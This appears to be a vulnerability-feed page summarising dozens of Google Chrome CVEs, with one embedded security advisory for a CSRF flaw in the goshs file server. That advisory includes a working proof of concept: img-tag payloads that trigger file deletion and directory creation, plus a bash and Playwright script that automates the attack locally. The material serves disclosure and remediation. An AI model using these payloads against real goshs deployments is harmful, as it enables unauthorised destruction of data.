Chrome
Monthly
Raindrop.io Bookmark Manager Web App version 5.6.76.0 allows remote unauthenticated attackers to obtain sensitive user data through insufficient validation of Chrome extension identifiers in crafted requests. The vulnerability exploits improper input validation (CWE-20) to bypass security controls, enabling information disclosure with low integrity impact. No active exploitation has been confirmed in CISA KEV, but publicly available vulnerability research exists on GitHub.
Out of bounds read in Skia in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted file. (Chromium security severity: Medium)
Remote code execution in Google Chrome on Android versions prior to 147.0.7727.101 is possible through a use-after-free vulnerability in the Payments feature. Attackers who successfully convince users to perform specific UI interactions on a malicious webpage can achieve arbitrary code execution with high impact to confidentiality, integrity, and availability. The vulnerability requires high attack complexity and user interaction (CVSS:3.1/AV:N/AC:H/PR:N/UI:R), indicating social engineering is necessary. Google has released Chrome 147.0.7727.101 to address this issue. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept code has been identified at time of analysis.
Arbitrary code execution within Chrome's sandbox affects all versions prior to 147.0.7727.101 via crafted HTML pages exploiting a use-after-free in codec processing. Remote attackers require user interaction (visiting a malicious page) but need no authentication. CVSS 8.8 (High) with network attack vector, low complexity, and high impact across confidentiality, integrity, and availability. Google patched this in the stable channel update released April 15, 2026. No public exploit code or CISA KEV listing identified at time of analysis, though Chromium issue tracker #495996858 indicates vendor-confirmed vulnerability. The sandbox containment limits initial exploitation to Chrome's restricted environment, not direct system compromise.
Type Confusion in V8 in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)
Use after free in Cast in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
Use after free in Codecs in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted video file. (Chromium security severity: High)
Heap buffer overflow in PDFium in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High)
Use after free in Forms in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Permissions in Google Chrome on Android prior to 147.0.7727.101 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
Out of bounds write in GPU in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the GPU process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Insufficient policy enforcement in CORS in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Insufficient policy enforcement in Passwords in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Uninitialized Use in Accessibility in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Dawn in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in FileSystem in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)
Use after free in Viz in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Out-of-bounds read in Google Chrome's media component (versions prior to 147.0.7727.101) enables remote code execution when attackers convince users to perform specific UI interactions on a malicious HTML page. Google rated this high severity and released Chrome 147.0.7727.101 as a fix. No active exploitation confirmed via CISA KEV at time of analysis, though CVSS 7.5 reflects significant impact if user interaction prerequisite is met. The UI gesture requirement and high attack complexity (AC:H) reduce automated exploitation risk compared to interaction-free vulnerabilities.
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Heap buffer overflow in Google Chrome's PDFium library (versions prior to 147.0.7727.101) enables remote code execution within the Chrome sandbox when a victim opens a malicious PDF file. Despite CVSS 8.8 severity, exploitation requires user interaction (opening a crafted PDF) and is confined to the sandbox, limiting system-level impact. Vendor patch available in Chrome 147.0.7727.101. No active exploitation confirmed (not in CISA KEV), no public POC identified at time of analysis. EPSS data not provided.
Heap buffer overflow in PDFium in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High)
Use after free in Graphite in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Arbitrary code execution within Google Chrome's sandbox affects all versions prior to 147.0.7727.101 through a use-after-free vulnerability in the codec processing components. Remote attackers can exploit this by tricking users into visiting a malicious webpage, achieving high-severity compromise of confidentiality, integrity, and availability within the sandboxed renderer process. Google has released version 147.0.7727.101 as a stable channel update to address this flaw. No evidence of active exploitation (not in CISA KEV) or public exploit code has been identified at time of analysis, though the simplicity of the attack vector (network-based, low complexity, requiring only user interaction) warrants prioritized patching.
Use after free in Video in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in CSS in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Video in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
Use after free in XR in Google Chrome on Android prior to 147.0.7727.101 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Prerender in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical)
Heap buffer overflow in Skia in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Proxy in Google Chrome prior to 147.0.7727.101 allowed an attacker in a privileged network position to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Heap buffer overflow in ANGLE in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Google Chrome prior to 147.0.7727.55 contains insufficient validation of untrusted input in WebSockets that allows a remote attacker with a compromised renderer process to bypass same-origin policy via a crafted HTML page. This vulnerability requires prior renderer compromise and user interaction, limiting real-world exploitability despite the high CVSS score. EPSS scoring (0.02%, 6th percentile) and Chromium's own Low severity classification indicate minimal practical risk despite the integrity impact rating.
Google Chrome prior to version 147.0.7727.55 contains an information disclosure vulnerability in the Navigation component that allows a remote attacker with a compromised renderer process to leak cross-origin data via a crafted HTML page. The vulnerability requires user interaction and only affects confidentiality (CVSS 4.3), with an extremely low EPSS score of 0.03% indicating minimal real-world exploitation probability despite the unauthenticated attack vector.
Out-of-bounds memory write in Google Chrome's WebML component (versions prior to 147.0.7727.55) allows remote attackers to corrupt memory via malicious HTML pages, enabling potential code execution or denial of service. Exploitation requires user interaction to visit a crafted webpage. CVSS 8.1 severity reflects unauthenticated network-based attack with high integrity and availability impact. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.04%).
Type confusion vulnerability in Google Chrome CSS engine (versions prior to 147.0.7727.55) enables heap corruption through malicious extensions. Attacker must convince user to install crafted Chrome extension, then exploit triggers memory corruption allowing high-severity impacts: arbitrary code execution, information disclosure, and denial of service. CVSS 8.8 rating reflects unauthenticated network vector requiring only user interaction. No public exploit identified at time of analysis. Chromium project classifies severity as Low despite critical CVSS score, indicating successful exploitation barriers beyond user interaction.
Out-of-bounds read in Google Chrome's Blink rendering engine (versions prior to 147.0.7727.55) allows remote attackers to disclose sensitive memory contents and trigger denial-of-service via malicious HTML pages. Despite an 8.1 CVSS score, this is rated Chromium security severity 'Low', requires user interaction (visiting a crafted page), has minimal real-world exploitation probability (EPSS 0.03%, 10th percentile), and is not actively exploited (no KEV listing). Vendor-released patch available in Chrome 147.0.7727.55.
Integer overflow in Google Chrome's WebRTC component (versions prior to 147.0.7727.55) enables remote attackers to trigger out-of-bounds memory writes through specially crafted HTML pages. Exploitation requires user interaction (visiting malicious page) but no authentication, potentially allowing arbitrary code execution, data corruption, or information disclosure. Vendor-assigned security severity: Low; CVSS 8.8 reflects high impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis.
Content security policy bypass in Google Chrome prior to version 147.0.7727.55 allows remote attackers to bypass CSP protections via ServiceWorker policy manipulation when users interact with crafted HTML pages. The vulnerability requires user interaction (UI:R in CVSS) and results in integrity impact only; EPSS exploitation probability is minimal at 0.02%, and Chromium rates the security severity as low despite the policy bypass nature.
Integer overflow in Google Chrome's media handling (versions prior to 147.0.7727.55) enables remote attackers to trigger heap corruption through specially crafted video files, achieving potential arbitrary code execution with high confidentiality, integrity, and availability impact. Attack requires user interaction to open malicious media content. Exploitation is unauthenticated (network-accessible). No public exploit identified at time of analysis. Classified as low severity by Chromium project despite CVSS 8.8 rating.
Integer overflow in Google Chrome's Media component enables remote heap corruption through malicious video files. Affects Chrome versions prior to 147.0.7727.55 on all desktop platforms. Unauthenticated attackers can achieve arbitrary code execution, data theft, or denial of service by convincing users to open specially crafted video content. CVSS 8.8 severity reflects network-based attack requiring user interaction. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS <1%).
Integer overflow in Google Chrome's Media component allows remote attackers to trigger heap corruption via specially crafted video files. Affects Chrome versions prior to 147.0.7727.55. Attack requires user interaction (opening malicious video file) but no authentication. Successful exploitation enables arbitrary code execution with high impact to confidentiality, integrity, and availability. No public exploit identified at time of analysis. Chromium project rates severity as Low despite CVSS 8.8 score.
Out-of-bounds memory read in Google Chrome's media subsystem (versions prior to 147.0.7727.55) enables remote attackers to disclose sensitive information and trigger denial-of-service conditions via malicious video files. Exploitation requires user interaction (opening/playing crafted video content). Attack vector is network-based with low complexity and no authentication required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.03%, 10th percentile).
Omnibox spoofing in Google Chrome on Android prior to version 147.0.7727.55 allows remote attackers to deceive users by displaying falsified URL bar contents through a crafted HTML page, enabling phishing and social engineering attacks without requiring user interaction beyond visiting a malicious site. Despite a low CVSS score of 4.3 and minimal EPSS exploitation probability (0.03%), the vulnerability has real-world impact because attackers can trick users into believing they are on legitimate domains while actually on attacker-controlled pages.
Domain spoofing via incorrect security UI in Google Chrome on Windows prior to version 147.0.7727.55 allows unauthenticated remote attackers to deceive users through crafted HTML pages that exploit flawed permission display mechanisms. The attack requires user interaction (clicking or viewing a malicious page) but carries moderate real-world risk due to low EPSS exploitation probability (0.03%, 7th percentile) despite the high CVSS impact score, suggesting the vulnerability requires specific user actions or conditions to successfully exploit.
Heap corruption via malicious Chrome extension exploits use-after-free flaw in V8 JavaScript engine, affecting Chrome versions prior to 147.0.7727.55. Attacker must convince user to install a crafted extension to achieve potential remote code execution with high confidentiality, integrity, and availability impact. EPSS score of 0.01% (1st percentile) indicates minimal observed exploitation activity; no CISA KEV listing or public exploit code identified at time of analysis. Despite high CVSS 8.8
Bypass of iframe sandbox navigation restrictions in Google Chrome prior to version 147.0.7727.55 allows remote attackers to circumvent security boundaries via a crafted HTML page combined with specific user UI gestures. The vulnerability affects the IFrameSandbox security mechanism, which is designed to prevent iframes from navigating the top-level window; successful exploitation requires user interaction but results in direct integrity impact through unauthorized navigation. This is a low-severity issue with minimal exploitation probability (EPSS 0.02%, percentile 3%) and no confirmed active exploitation.
Media stream metadata corruption in Google Chrome for Android prior to 147.0.7727.55 enables remote attackers who have already compromised the renderer process to corrupt media stream metadata via a race condition (CWE-362) in the Media component. Despite a critical CVSS 9.8 score with network-accessible attack vector, real-world exploitation requires pre-compromise of the renderer, and EPSS probability is very low (0.03%, 9th percentile). Vendor patch released in Chrome 147.0.7727.55. No public exploit or active exploitation (KEV) identified at time of analysis. Chromium rates this Low severity, contrasting sharply with the theoretical CVSS rating.
Insufficient policy enforcement in Google Chrome's DevTools allows unauthenticated attackers who convince users to install a malicious extension to bypass enterprise host restrictions and modify cookies, affecting Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction to install the malicious extension but grants attackers the ability to circumvent security policies protecting sensitive cookie data. With an EPSS score of 0.01% and Chromium severity rated as Low, real-world exploitation is unlikely despite the moderate CVSS score of 6.5.
Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the Downloads feature that allows remote attackers to circumvent multi-download protections through a crafted HTML page. The vulnerability requires user interaction (clicking or accepting a download), affects integrity only (no code execution or availability impact), and carries a low Chromium severity rating. EPSS exploitation probability is minimal at 0.02% (3rd percentile), indicating this is primarily a user-experience or policy-enforcement issue rather than a critical security risk.
Insufficient policy enforcement in History Navigation in Google Chrome prior to version 147.0.7727.55 enables cross-site scripting (UXSS) attacks when users perform specific UI gestures on attacker-controlled pages, allowing injection of arbitrary scripts or HTML with potential impact on user data confidentiality and integrity. The vulnerability affects all Chrome versions before 147.0.7727.55 across all platforms, requires user interaction with specific UI gestures but no authentication, and carries a low Chromium severity rating despite a moderate CVSS score. No public exploit code has been identified at the time of analysis, though the vulnerability was tracked via Chromium issue tracking.
UI spoofing in Google Chrome on iOS prior to version 147.0.7727.55 allows remote attackers to deceive users through malicious HTML pages that manipulate the Omnibox security indicator, enabling phishing or credential theft without code execution. The vulnerability requires user interaction and has low confidentiality impact, reflected in both the CVSS score of 4.3 and minimal EPSS score of 0.03%, indicating limited real-world exploitation likelihood despite public discoverability.
UI spoofing in Google Chrome's Downloads interface prior to version 147.0.7727.55 allows remote attackers to deceive users into performing unintended actions via crafted HTML pages exploiting incorrect security UI rendering. The vulnerability requires user interaction with specific UI gestures on a malicious webpage, resulting in limited integrity impact through visual deception rather than code execution or data exfiltration. Although marked as low severity by Chromium and carrying minimal exploitation probability (EPSS 0.03%), the attack surface is broad given Chrome's prevalence as a target for social engineering.
Google Chrome prior to version 147.0.7727.55 contains a sandbox bypass vulnerability in the Audio subsystem that allows remote attackers to circumvent download policy restrictions by convincing users to perform specific UI gestures on a crafted HTML page. The vulnerability has low practical exploitability (EPSS 0.02%) and requires active user interaction, limiting real-world risk despite cross-origin scope impact.
Google Chrome on iOS prior to version 147.0.7727.55 contains an Omnibox (URL bar) spoofing vulnerability that allows remote attackers to display misleading domain names to users through crafted domains, potentially enabling phishing attacks. The vulnerability requires user interaction (clicking a link) and affects iOS-specific browser UI rendering. While assigned a low Chromium security severity and rated 5.4 CVSS, the practical exploitation probability remains minimal (0.03% EPSS) due to the high user-interaction requirement and limited information-disclosure impact.
Google Chrome prior to version 147.0.7727.55 contains an inappropriate PDF implementation that allows remote attackers to bypass navigation restrictions via a crafted HTML page. The vulnerability requires user interaction to trigger and offers low real-world risk, with an EPSS score of 0.02% (3rd percentile) indicating minimal exploitation probability despite its network-accessible attack vector. A vendor-released patch is available.
Remote code execution in Google Chrome prior to 147.0.7727.55 exploits a race condition in the V8 JavaScript engine to corrupt heap memory via crafted HTML, requiring user interaction. The vulnerability affects all Chrome versions below 147.0.7727.55 across all platforms via the CPE cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*. No public exploit code or active exploitation has been confirmed at time of analysis, though the Chromium security team rated it medium severity; EPSS scoring at 0.03% (9th percentile) indicates low real-world exploitation probability despite the high CVSS score of 6.8.
Insufficient policy enforcement in PWA installation within Google Chrome prior to version 147.0.7727.55 allows a local attacker with renderer process compromise to install a Progressive Web App without user consent via a crafted HTML page. This vulnerability requires prior compromise of the renderer process and user interaction, resulting in high integrity and availability impact. The issue carries a low real-world exploitation probability (EPSS 0.03%), reflecting the significant prerequisites needed to trigger the vulnerability.
UI spoofing in Google Chrome prior to version 147.0.7727.55 allows remote attackers with a compromised renderer process to deceive users through crafted HTML pages. The vulnerability requires prior renderer compromise, limiting real-world exploitation to scenarios where an attacker has already achieved code execution within the browser's sandboxed rendering context. No active exploitation confirmed; EPSS score of 0.03% indicates minimal exploitation probability.
Race in WebCodecs in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)
Cryptographic weakness in PDFium allows unauthenticated remote attackers to decrypt and read sensitive information from password-protected PDFs through brute-force attacks when users view malicious or compromised PDF files in Google Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction (opening a PDF) but combines weak cryptographic design (CWE-326) with low attack complexity, making it feasible for attackers to extract confidential content from encrypted documents. EPSS score of 0.01% indicates minimal real-world exploitation likelihood despite Chromium's medium severity classification.
Information disclosure in Google Chrome prior to 147.0.7727.55 allows remote attackers to read sensitive process memory through the WebCodecs API via a crafted HTML page. Exploitation requires user interaction (UI:R) to visit a malicious webpage but grants high-confidence memory access. The vulnerability has low real-world exploitation probability (EPSS 0.03%) despite satisfying network-accessible conditions, likely due to unreliable memory content extraction and WebCodecs' limited practical attack surface in typical user workflows.
Google Chrome on Windows prior to version 147.0.7727.55 fails to properly validate user input in the Downloads functionality, allowing remote attackers to bypass download restrictions through a crafted HTML page. The vulnerability requires user interaction (clicking a link or visiting a malicious page) but has low real-world impact-it enables integrity bypass only, not code execution or confidentiality breaches. No public exploit code or active exploitation has been identified; the low EPSS score (0.02%) reflects minimal practical risk despite the network attack vector.
Out-of-bounds read in Google Chrome WebAudio (Mac) prior to version 147.0.7727.55 enables remote information disclosure via crafted HTML. Unauthenticated network-based attacker can extract sensitive process memory without user interaction. CVSS 7.5 (High confidentiality impact). No public exploit identified at time of analysis. Low observed exploitation activity (EPSS <1%). Patch available from vendor.
Memory disclosure in Google Chrome on Windows prior to version 147.0.7727.55 allows remote attackers to extract sensitive information from process memory by delivering a crafted HTML page through WebML parsing. The vulnerability stems from insufficient input validation in the WebML component and requires user interaction (visiting a malicious page), making it a moderate-risk information disclosure affecting a ubiquitous browser platform.
Remote code execution in Google Chrome prior to 147.0.7727.55 allows attackers to escape renderer sandbox via malicious HTML page. A remote attacker who has already compromised the renderer process can achieve arbitrary code execution within the sandbox through insufficient input validation in Chrome's Media component. Requires user interaction (visiting crafted page). EPSS score of 0.05% (16th percentile) indicates low observed exploitation probability; no confirmed active exploitation (not in CISA KEV). Vendor patch released in Chrome 147.0.7727.55.
Use after free in Media in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)
UI spoofing in Google Chrome fullscreen mode prior to version 147.0.7727.55 allows remote attackers to deceive users with crafted HTML pages displaying fake security UI elements, potentially leading to credential theft or malware distribution through trusted-looking interface impersonation. The vulnerability requires user interaction (clicking/navigating to the malicious page) but poses moderate integrity risk due to the deceptive nature of fullscreen UI manipulation. No active exploitation has been confirmed, though the attack vector is straightforward for mass phishing campaigns.
Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the LocalNetworkAccess feature that allows remote attackers to circumvent navigation restrictions by delivering a crafted HTML page. An unauthenticated attacker requires only user interaction (clicking or viewing the malicious page) to trigger the bypass, resulting in integrity compromise of network access policies. EPSS exploitation probability is low at 0.02%, and no public exploit code or active exploitation has been reported.
Omnibox spoofing in Google Chrome prior to 147.0.7727.55 allows remote attackers with a compromised renderer process to spoof the URL bar contents via crafted HTML, deceiving users about the actual page origin. The vulnerability requires renderer process compromise (post-sandbox-escape condition) and user interaction, limiting real-world exploitation to multi-stage attacks. Patch available in Chrome 147.0.7727.55 and later; EPSS score of 0.03% reflects low autonomous exploitation likelihood despite medium CVSS rating.
Remote code execution in Google Chrome's ANGLE graphics layer on macOS prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser's sandbox via malicious HTML pages. The vulnerability stems from insufficient input validation (CWE-20) in ANGLE, Chrome's OpenGL ES implementation layer. While rated 8.8 CVSS due to complete confidentiality/integrity/availability impact, EPSS exploitation probability is low (0.05%, 16th percentile) with no public exploit identified at time of analysis and no confirmed active exploitation (CISA KEV).
UI spoofing via incorrect security UI rendering in Google Chrome's Blink engine allows remote attackers to deceive users into trusting malicious content through crafted HTML pages, affecting Chrome versions prior to 147.0.7727.55. The attack requires user interaction (clicking or viewing the malicious page) but no authentication. While assigned Medium severity by Google and carrying low EPSS exploitation probability (0.03%, 10th percentile), the integrity impact centers on user trust and phishing enablement rather than code execution.
Remote code execution within Chrome's sandbox affects all versions prior to 147.0.7727.55 through a use-after-free vulnerability in the browser's navigation component. Remote attackers can execute arbitrary code by delivering a specially crafted HTML page that triggers memory corruption when a user visits the malicious site. EPSS probability of 0.04% indicates low observed exploitation activity, and no CISA KEV listing confirms this is not confirmed actively exploited at time of analysis. Google has released patches in Chrome 147.0.7727.55.
Side-channel information leakage in Google Chrome's Navigation feature prior to version 147.0.7727.55 allows unauthenticated remote attackers to extract cross-origin data by serving a crafted HTML page. The vulnerability requires user interaction (clicking or navigating to a malicious page) but successfully bypasses same-origin policy protections, exposing sensitive information from different origins. With an EPSS score of 0.03% (10th percentile) indicating very low real-world exploitation probability, this represents a medium-severity information disclosure risk appropriate for routine patching rather than emergency mitigation.
UI spoofing via policy bypass in Blink rendering engine in Google Chrome prior to version 147.0.7727.55 allows remote attackers to deceive users through crafted HTML pages. The vulnerability requires user interaction (clicking or viewing) but needs no authentication, affecting all Chrome users on unpatched versions. Chromium security team rated this as Medium severity; EPSS score of 0.02% indicates low real-world exploitation probability despite public disclosure.
Use-after-free vulnerability in Google Chrome's PrivateAI component (versions prior to 147.0.7727.55) enables sandbox escape when remote attackers socially engineer victims into performing specific UI interactions with malicious HTML pages. Exploitation requires user engagement with attacker-controlled content but no authentication. CVSS 9.6 critical severity reflects potential for complete compromise of confidentiality, integrity, and availability with scope change indicating sandbox boundary violation. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.03%).
Remote code execution in Google Chrome prior to 147.0.7727.55 allows attackers to execute arbitrary code within the browser sandbox through crafted HTML pages exploiting out-of-bounds read/write conditions in the V8 JavaScript engine. User interaction (visiting a malicious page) is required, but no authentication is needed. With CVSS 8.8 and low EPSS (0.04%, 11th percentile), this represents a high-severity browser vulnerability with limited observed real-world exploitation activity. Patch available in Chrome 147.0.7727.55. No public exploit identified at time of analysis.
Remote code execution in Google Chrome's Blink rendering engine (versions prior to 147.0.7727.55) allows unauthenticated attackers to execute arbitrary code within Chrome's sandbox by delivering a malicious HTML page that triggers a use-after-free vulnerability. While rated High severity (CVSS 8.8) due to complete confidentiality/integrity/availability impact, EPSS scoring places exploitation probability at only 4% (11th percentile), indicating low observed targeting in the wild. No confirmed active exploitation (not in CISA KEV) and no public proof-of-concept identified at time of analysis. Vendor-released patch available in Chrome 147.0.7727.55.
